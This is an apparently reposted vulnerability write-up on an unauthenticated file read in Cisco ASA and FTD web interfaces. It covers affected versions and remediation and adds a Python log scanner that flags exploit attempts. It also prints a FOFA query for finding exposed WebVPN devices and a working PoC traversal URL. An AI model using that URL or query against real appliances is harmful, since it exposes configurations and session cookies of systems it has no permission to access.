Cisco ASA remote arbitrary file read
0X00 Introduction
Cisco Adaptive Security Appliance (ASA) is a firewall appliance from Cisco.
0X01 Vulnerability overview
The web management interface of Cisco Adaptive Security Appliance (ASA) firewall appliances and Cisco Firepower Threat Defense (FTD) appliances contains an unauthenticated directory traversal and remote arbitrary file read vulnerability. An attacker can only read files under the web directory; files outside the web directory cannot be reached through this flaw. What can be read includes the WebVPN configuration of the appliance, cookies, and similar data.
0X02 Affected versions
Affected Cisco ASA releases:
- Earlier than 9.6.1
- 9.6 < 9.6.4.42
- 9.71
- 9.8 < 9.8.4.20
- 9.9 < 9.9.2.74
- 9.10 < 9.10.1.42
- 9.12 < 9.12.3.12
- 9.13 < 9.13.1.10
- 9.14 < 9.14.1.10
Affected Cisco FTD releases:
- 6.2.2
- 6.2.3 < 6.2.3.16
- 6.3.0 (migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1)
- 6.4.0 < 6.4.0.9 + Hot Fix
- 6.5.0 (migrate to 6.6.0.1, or to 6.5.0.4 + Hot Fix, August 2020)
- 6.6.0 < 6.6.0.1
0X03 Reproducing the vulnerability
FOFA search rule:
FOFA: "webVpn"

The PoC is https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
The part marked in red in the original (the textdomain value, /+CSCOE+/portal_inc.lua in this PoC) is the name of the file being read.
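As an added defender-side example (not part of the original article), the following Python script scans web access log lines for requests to the translation-table endpoint whose lang parameter carries a traversal sequence, and reports which textdomain file was requested. The log lines and the common-log line format are constructed assumptions; the "path-like textdomain" check is a heuristic added here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint abused by the traversal described above (path as in the PoC).
TARGET_PATH = "/+CSCOT+/translation-table"

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Jul/2020:10:01:02 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 1523
203.0.113.11 - - [22/Jul/2020:10:01:05 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 8810
203.0.113.12 - - [22/Jul/2020:10:01:09 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 412
203.0.113.13 - - [22/Jul/2020:10:01:12 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/logon.html&default-language&lang=%2e%2e%2f HTTP/1.1" 200 1523
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e%2f and double-encoded forms become ../."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def parse_request(url):
    """Return (decoded path, decoded lang, decoded textdomain) for a request URL."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    lang = decode_fully("".join(qs.get("lang", [])))
    textdomain = decode_fully("".join(qs.get("textdomain", [])))
    return decode_fully(parts.path), lang, textdomain

def is_traversal_attempt(url):
    """Flag translation-table requests with ../ in lang, or a path-like textdomain (heuristic)."""
    path, lang, textdomain = parse_request(url)
    if path != TARGET_PATH:
        return False
    return "../" in lang or "..\\" in lang or textdomain.startswith("/")

def find_attempts(log_text):
    """Return (source_ip, status, requested textdomain) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m["url"]):
            hits.append((m["src"], int(m["status"]), parse_request(m["url"])[2]))
    return hits

if __name__ == "__main__":
    for src, status, td in find_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {src}: status={status} file={td}")
```

A 200 status on a flagged request is worth escalating, since it indicates the appliance served the file rather than rejecting the traversal.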


0X04 Remediation
Install the latest Cisco ASA/FTD patches and upgrade to a fixed release.
For details, see: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
0X05 References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://twitter.com/aboul3la/status/1286809567989575685
Please credit the source when reposting. Link to this article: https://www.uj5u.com/qiye/860.html
